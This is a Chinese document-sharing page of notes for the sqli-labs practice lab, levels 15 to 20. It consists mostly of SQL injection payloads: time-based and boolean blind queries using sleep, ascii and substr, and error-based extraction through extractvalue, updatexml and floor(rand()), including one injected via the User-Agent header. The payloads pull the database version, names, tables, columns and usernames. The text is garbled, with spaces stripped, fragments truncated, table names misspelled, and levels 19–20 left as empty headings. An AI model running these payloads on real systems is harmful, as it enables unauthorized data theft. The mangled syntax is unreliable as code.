lxsqli labsWord格式文档下载.docx

资源描述

lxsqli labsWord格式文档下载.docx

《lxsqli labsWord格式文档下载.docx》由会员分享，可在线阅读，更多相关《lxsqli labsWord格式文档下载.docx（22页珍藏版）》请在冰点文库上搜索。

lxsqli labsWord格式文档下载.docx

andif（left（version（）,1）=5,0,sleep（10））#&

submit）#正确版本

3、判断数据库库名的长度

andif（length（database（））=7,0,sleep（10））#&

submit）#错误长度

andif（length（database（））=8,0,sleep（10））#&

submit）#正确长度

4、猜库名的首字母

andif（left（database（）,1）>

0,sleep（10））#&

submit）#错误首字母

submit）#正确首字母

猜测第二个字符

5、猜测数据库中表名首字母

andif（ascii（substr（（selecttable_namefrominformation_schema.tableswheretable_schema='

security'

limit0,1）,1,1））>

100,1,sleep（10））#&

submit）

6、查询数据库表中的列

andif（ascii（substr（1=（select1frominformation_schema.columnswheretable_name='

users'

andcolumn_nameregexp'

^usernam[a-d]'

limit0,1）,1,1））,1,sleep（8））#&

passwd=admin&

7、猜测数据库表中列中字段信息

andif（ascii（substr（（selectusernamefromuserslimit0,1）,1,1））>

68,1,sleep（8））#&

SQLILABS16

1、判断注入点

#uname=admin"

）and1=2#&

submit

2、判断数据库的版本

）andleft（version（）,1）=5#&

3、判断数据库库名的长度

）andlength（database（））=8#&

4、猜测数据库库名的首字母

）andleft（database（）,1）>

5、猜测数据库内的表

）andascii（substr（（selecttable_namefrominformation_schema.tableswheretable_schema=database（）limit0,1）,1,1））>

101#&

6、猜测数据库的表内的列名

#uname=1"

）orif（ascii（substr（1=（selectcolumn_namefrominformation_schema.columnswheretable_name='

andcolumn_nameregexp'

^usernam[e]'

limit0,1）,1,1））,1,sleep（9））#&

submit=Submit

7、猜测数据库内表的列内字段

）orif（ascii（substr（（selectusernamefromuserslimit0,1）,1,1））>

111,1,sleep（10））#&

SQLILABS17

查询数据库版本

#uname=admin&

passwd=11'

andextractvalue（1,concat（0x7e,（select@@version）,0x7e））#&

查询数据库库名

查询数据库库内的表名

andextractvalue（1,concat（0x7e,（selecttable_namefrominformation_schema.tableswheretable_schema='

limit2,1）,0x7e））#&

查询数据库内表内的列

andextractvalue（1,concat（0x7e,（selectcolumn_namefrominformation_schema.columnswheretable_name='

limit9,1）,0x7e））#&

查询数据库表中的列的字段信息

#uname=admin&

passwd=123'

AND（select1from（selectcount（*）,（concat（"

（selectusernamefromuserslimit0,1）,"

floor（rand（）*2）））namefrominformation_schema.tablesgroupbyname）b）#&

SQLILABS18

判断当前数据库名

orupdatexml（1,concat（0x7e,（SELECTdatabase（））,0x7e）,1）,1,1）#

判断数据库的版本号：

#在原本的User-Agent后加上：

’orupdatexml（1,concat（0x7e,（SELECT@@version）,0x7e）,1）,1,1）#

判断数据库的表名

orupdatexml（1,concat（0x7e,（selecttable_namefrominformation_schema.tableswheretable_schema=database（）limit0,1）,0x7e）,1）,1,1）#

判断users表第一字段

orupdatexml（1,concat（0x7e,（selectcolumn_namefrominformation_schema.columnswheretable_schema=database（）andtable_name='

usersd'

limit0,1）,0x7e）,1）,1,1）#

判断users表第二字段

limit1,1）,0x7e）,1）,1,1）#

判断users表中的username第一个

orupdatexml（1,concat（0x7e,（selectusernamefromusreslimit0,1）,0x7e）,1）,1,1）#

SQLILABS19

判断数据库的版本

判断数据库库名

判断数据库的第四个表

判断user表的第一列

判断users表的第二列

查询字段信息

SQLILABS20

判断数据库的库名

判断数据库的所有库

判断suecurity库内的表

判断users表中的列

判断列的内容

展开阅读全文